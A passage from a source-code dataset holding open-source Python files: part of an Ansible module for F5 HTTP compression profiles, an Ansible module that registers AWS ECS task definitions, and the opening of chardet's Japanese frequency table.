api_attributes = [
'description',
'bufferSize',
'defaultsFrom',
'gzipMemoryLevel',
'gzipLevel',
'gzipWindowSize',
]
returnables = [
'description',
'buffer_size',
'gzip_memory_level',
'gzip_level',
'gzip_window_size',
]
updatables = [
'description',
'buffer_size',
'gzip_memory_level',
'gzip_level',
'gzip_window_size',
]
class ApiParameters(Parameters):
@property
def description(self):
if self._values['description'] in [None, 'none']:
return None
return self._values['description']
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] / 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] / 1024
class ModuleParameters(Parameters):
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] * 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] * 1024
class ReportableChanges(Changes):
@property
def gzip_memory_level(self):
if self._values['gzip_memory_level'] is None:
return None
return self._values['gzip_memory_level'] / 1024
@property
def gzip_window_size(self):
if self._values['gzip_window_size'] is None:
return None
return self._values['gzip_window_size'] / 1024
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def parent(self):
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent profile cannot be changed"
)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403, 404]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 404]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
raise F5ModuleError(resp.content)
def read_current_from_device(self): # lgtm [py/similar-function]
uri = "https://{0}:{1}/mgmt/tm/ltm/profile/http-compression/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent=dict(),
buffer_size=dict(type='int'),
description=dict(),
gzip_level=dict(
type='int',
choices=[1, 2, 3, 4, 5, 6, 7, 8, 9]
),
gzip_memory_level=dict(
type='int',
choices=[1, 2, 4, 8, 16, 32, 64, 128, 256]
),
gzip_window_size=dict(
type='int',
choices=[1, 2, 4, 8, 16, 32, 64, 128]
),
state=dict(
default='present',
choices=['present', 'absent']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gpl-3.0 |
nitzmahone/ansible | lib/ansible/modules/cloud/amazon/ecs_taskdefinition.py | 20 | 19863 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_taskdefinition
short_description: register a task definition in ecs
description:
- Registers or deregisters task definitions in the Amazon Web Services (AWS) EC2 Container Service (ECS)
version_added: "2.0"
author: Mark Chance (@Java1Guy)
requirements: [ json, botocore, boto3 ]
options:
state:
description:
- State whether the task definition should exist or be deleted
required: true
choices: ['present', 'absent']
arn:
description:
- The arn of the task description to delete
required: false
family:
description:
- A Name that would be given to the task definition
required: false
revision:
description:
- A revision number for the task definition
required: False
force_create:
description:
- Always create new task definition
required: False
version_added: 2.5
type: bool
containers:
description:
- A list of containers definitions
required: False
network_mode:
description:
- The Docker networking mode to use for the containers in the task.
- C(awsvpc) mode was added in Ansible 2.5
required: false
default: bridge
choices: [ 'bridge', 'host', 'none', 'awsvpc' ]
version_added: 2.3
task_role_arn:
description:
- The Amazon Resource Name (ARN) of the IAM role that containers in this task can assume. All containers in this task are granted
the permissions that are specified in this role.
required: false
version_added: 2.3
execution_role_arn:
description:
- The Amazon Resource Name (ARN) of the task execution role that the Amazon ECS container agent and the Docker daemon can assume.
required: false
version_added: 2.7
volumes:
description:
- A list of names of volumes to be attached
required: False
launch_type:
description:
- The launch type on which to run your task
required: false
version_added: 2.7
choices: ["EC2", "FARGATE"]
cpu:
description:
- The number of cpu units used by the task. If using the EC2 launch type, this field is optional and any value can be used.
If using the Fargate launch type, this field is required and you must use one of [256, 512, 1024, 2048, 4096]
required: false
version_added: 2.7
memory:
description:
- The amount (in MiB) of memory used by the task. If using the EC2 launch type, this field is optional and any value can be used.
If using the Fargate launch type, this field is required and is limited by the cpu
required: false
version_added: 2.7
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create task definition
ecs_taskdefinition:
containers:
- name: simple-app
cpu: 10
essential: true
image: "httpd:2.4"
memory: 300
mountPoints:
- containerPath: /usr/local/apache2/htdocs
sourceVolume: my-vol
portMappings:
- containerPort: 80
hostPort: 80
logConfiguration:
logDriver: awslogs
options:
awslogs-group: ecs
awslogs-region: us-west-2
- name: busybox
command:
- >
/bin/sh -c "while true; do echo '<html><head><title>Amazon ECS Sample App</title></head><body><div><h1>Amazon ECS Sample App</h1><h2>Congratulations!
</h2><p>Your application is now running on a container in Amazon ECS.</p>' > top; /bin/date > date ; echo '</div></body></html>' > bottom;
cat top date bottom > /usr/local/apache2/htdocs/index.html ; sleep 1; done"
cpu: 10
entryPoint:
- sh
- "-c"
essential: false
image: busybox
memory: 200
volumesFrom:
- sourceContainer: simple-app
volumes:
- name: my-vol
family: test-cluster-taskdef
state: present
register: task_output
- name: Create task definition
ecs_taskdefinition:
family: nginx
containers:
- name: nginx
essential: true
image: "nginx"
portMappings:
- containerPort: 8080
hostPort: 8080
cpu: 512
memory: 1GB
state: present
- name: Create task definition
ecs_taskdefinition:
family: nginx
containers:
- name: nginx
essential: true
image: "nginx"
portMappings:
- containerPort: 8080
hostPort: 8080
launch_type: FARGATE
cpu: 512
memory: 1GB
state: present
network_mode: awsvpc
'''
RETURN = '''
taskdefinition:
description: a reflection of the input parameters
type: dict
returned: always
'''
try:
import botocore
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import boto3_conn, camel_dict_to_snake_dict, ec2_argument_spec, get_aws_connection_info
from ansible.module_utils._text import to_text
class EcsTaskManager:
"""Handles ECS Tasks"""
def __init__(self, module):
self.module = module
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
self.ecs = boto3_conn(module, conn_type='client', resource='ecs', region=region, endpoint=ec2_url, **aws_connect_kwargs)
def describe_task(self, task_name):
try:
response = self.ecs.describe_task_definition(taskDefinition=task_name)
return response['taskDefinition']
except botocore.exceptions.ClientError:
return None
def register_task(self, family, task_role_arn, execution_role_arn, network_mode, container_definitions, volumes, launch_type, cpu, memory):
validated_containers = []
# Ensures the number parameters are int as required by boto
for container in container_definitions:
for param in ('memory', 'cpu', 'memoryReservation'):
if param in container:
container[param] = int(container[param])
if 'portMappings' in container:
for port_mapping in container['portMappings']:
for port in ('hostPort', 'containerPort'):
if port in port_mapping:
port_mapping[port] = int(port_mapping[port])
if network_mode == 'awsvpc' and 'hostPort' in port_mapping:
if port_mapping['hostPort'] != port_mapping.get('containerPort'):
self.module.fail_json(msg="In awsvpc network mode, host port must be set to the same as "
"container port or not be set")
validated_containers.append(container)
params = dict(
family=family,
taskRoleArn=task_role_arn,
networkMode=network_mode,
containerDefinitions=container_definitions,
volumes=volumes
)
if cpu:
params['cpu'] = cpu
if memory:
params['memory'] = memory
if launch_type:
params['requiresCompatibilities'] = [launch_type]
if execution_role_arn:
params['executionRoleArn'] = execution_role_arn
try:
response = self.ecs.register_task_definition(**params)
except botocore.exceptions.ClientError as e:
self.module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
return response['taskDefinition']
def describe_task_definitions(self, family):
data = {
"taskDefinitionArns": [],
"nextToken": None
}
def fetch():
# Boto3 is weird about params passed, so only pass nextToken if we have a value
params = {
'familyPrefix': family
}
if data['nextToken']:
params['nextToken'] = data['nextToken']
result = self.ecs.list_task_definitions(**params)
data['taskDefinitionArns'] += result['taskDefinitionArns']
data['nextToken'] = result.get('nextToken', None)
return data['nextToken'] is not None
# Fetch all the arns, possibly across multiple pages
while fetch():
pass
# Return the full descriptions of the task definitions, sorted ascending by revision
return list(
sorted(
[self.ecs.describe_task_definition(taskDefinition=arn)['taskDefinition'] for arn in data['taskDefinitionArns']],
key=lambda td: td['revision']
)
)
def deregister_task(self, taskArn):
response = self.ecs.deregister_task_definition(taskDefinition=taskArn)
return response['taskDefinition']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
arn=dict(required=False, type='str'),
family=dict(required=False, type='str'),
revision=dict(required=False, type='int'),
force_create=dict(required=False, default=False, type='bool'),
containers=dict(required=False, type='list'),
network_mode=dict(required=False, default='bridge', choices=['bridge', 'host', 'none', 'awsvpc'], type='str'),
task_role_arn=dict(required=False, default='', type='str'),
execution_role_arn=dict(required=False, default='', type='str'),
volumes=dict(required=False, type='list'),
launch_type=dict(required=False, choices=['EC2', 'FARGATE']),
cpu=dict(),
memory=dict(required=False, type='str')
))
module = AnsibleAWSModule(argument_spec=argument_spec,
supports_check_mode=True,
required_if=[('launch_type', 'FARGATE', ['cpu', 'memory'])]
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required.')
task_to_describe = None
task_mgr = EcsTaskManager(module)
results = dict(changed=False)
if module.params['launch_type']:
if not module.botocore_at_least('1.8.4'):
module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use launch_type')
if module.params['execution_role_arn']:
if not module.botocore_at_least('1.10.44'):
module.fail_json(msg='botocore needs to be version 1.10.44 or higher to use execution_role_arn')
if module.params['containers']:
for container in module.params['containers']:
for environment in container.get('environment', []):
environment['value'] = to_text(environment['value'])
if module.params['state'] == 'present':
if 'containers' not in module.params or not module.params['containers']:
module.fail_json(msg="To use task definitions, a list of containers must be specified")
if 'family' not in module.params or not module.params['family']:
module.fail_json(msg="To use task definitions, a family must be specified")
network_mode = module.params['network_mode']
launch_type = module.params['launch_type']
if launch_type == 'FARGATE' and network_mode != 'awsvpc':
module.fail_json(msg="To use FARGATE launch type, network_mode must be awsvpc")
family = module.params['family']
existing_definitions_in_family = task_mgr.describe_task_definitions(module.params['family'])
if 'revision' in module.params and module.params['revision']:
# The definition specifies revision. We must gurantee that an active revision of that number will result from this.
revision = int(module.params['revision'])
# A revision has been explicitly specified. Attempt to locate a matching revision
tasks_defs_for_revision = [td for td in existing_definitions_in_family if td['revision'] == revision]
existing = tasks_defs_for_revision[0] if len(tasks_defs_for_revision) > 0 else None
if existing and existing['status'] != "ACTIVE":
# We cannot reactivate an inactive revision
module.fail_json(msg="A task in family '%s' already exists for revsion %d, but it is inactive" % (family, revision))
elif not existing:
if not existing_definitions_in_family and revision != 1:
module.fail_json(msg="You have specified a revision of %d but a created revision would be 1" % revision)
elif existing_definitions_in_family and existing_definitions_in_family[-1]['revision'] + 1 != revision:
module.fail_json(msg="You have specified a revision of %d but a created revision would be %d" %
(revision, existing_definitions_in_family[-1]['revision'] + 1))
else:
existing = None
def _right_has_values_of_left(left, right):
# Make sure the values are equivalent for everything left has
for k, v in left.items():
if not ((not v and (k not in right or not right[k])) or (k in right and v == right[k])):
# We don't care about list ordering because ECS can change things
if isinstance(v, list) and k in right:
left_list = v
right_list = right[k] or []
if len(left_list) != len(right_list):
return False
for list_val in left_list:
if list_val not in right_list:
return False
else:
return False
# Make sure right doesn't have anything that left doesn't
for k, v in right.items():
if v and k not in left:
return False
return True
def _task_definition_matches(requested_volumes, requested_containers, requested_task_role_arn, existing_task_definition):
if td['status'] != "ACTIVE":
return None
if requested_task_role_arn != td.get('taskRoleArn', ""):
return None
existing_volumes = td.get('volumes', []) or []
if len(requested_volumes) != len(existing_volumes):
# Nope.
return None
if len(requested_volumes) > 0:
for requested_vol in requested_volumes:
found = False
for actual_vol in existing_volumes:
if _right_has_values_of_left(requested_vol, actual_vol):
found = True
break
if not found:
return None
existing_containers = td.get('containerDefinitions', []) or []
if len(requested_containers) != len(existing_containers):
# Nope.
return None
for requested_container in requested_containers:
found = False
for actual_container in existing_containers:
if _right_has_values_of_left(requested_container, actual_container):
found = True
break
if not found:
return None
return existing_task_definition
# No revision explicitly specified. Attempt to find an active, matching revision that has all the properties requested
for td in existing_definitions_in_family:
requested_volumes = module.params['volumes'] or []
requested_containers = module.params['containers'] or []
requested_task_role_arn = module.params['task_role_arn']
existing = _task_definition_matches(requested_volumes, requested_containers, requested_task_role_arn, td)
if existing:
break
if existing and not module.params.get('force_create'):
# Awesome. Have an existing one. Nothing to do.
results['taskdefinition'] = existing
else:
if not module.check_mode:
# Doesn't exist. create it.
volumes = module.params.get('volumes', []) or []
results['taskdefinition'] = task_mgr.register_task(module.params['family'],
module.params['task_role_arn'],
module.params['execution_role_arn'],
module.params['network_mode'],
module.params['containers'],
volumes,
module.params['launch_type'],
module.params['cpu'],
module.params['memory'])
results['changed'] = True
elif module.params['state'] == 'absent':
# When de-registering a task definition, we can specify the ARN OR the family and revision.
if module.params['state'] == 'absent':
if 'arn' in module.params and module.params['arn'] is not None:
task_to_describe = module.params['arn']
elif 'family' in module.params and module.params['family'] is not None and 'revision' in module.params and \
module.params['revision'] is not None:
task_to_describe = module.params['family'] + ":" + str(module.params['revision'])
else:
module.fail_json(msg="To use task definitions, an arn or family and revision must be specified")
existing = task_mgr.describe_task(task_to_describe)
if not existing:
pass
else:
# It exists, so we should delete it and mark changed. Return info about the task definition deleted
results['taskdefinition'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
task_mgr.deregister_task(task_to_describe)
results['changed'] = True
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
swarna-k/MyDiary | flask/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/jpcntx.py | 1777 | 19348 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .compat import wrap_ord
NUM_OF_CATEGORY = 6
DONT_KNOW = -1
ENOUGH_REL_THRESHOLD = 100
MAX_REL_THRESHOLD = 1000
MINIMUM_DATA_THRESHOLD = 4
# This is hiragana 2-char sequence table, the number in each cell represents its frequency category
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4),
(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4),
(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3),
(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3),
(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3),
(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4),
(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3),
(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4),
(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3),
(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5),
(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3),
(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5),
(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4),
(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4),
(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3),
(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3),
(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3),
(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5),
(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4),
(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5),
(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3),
(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4),
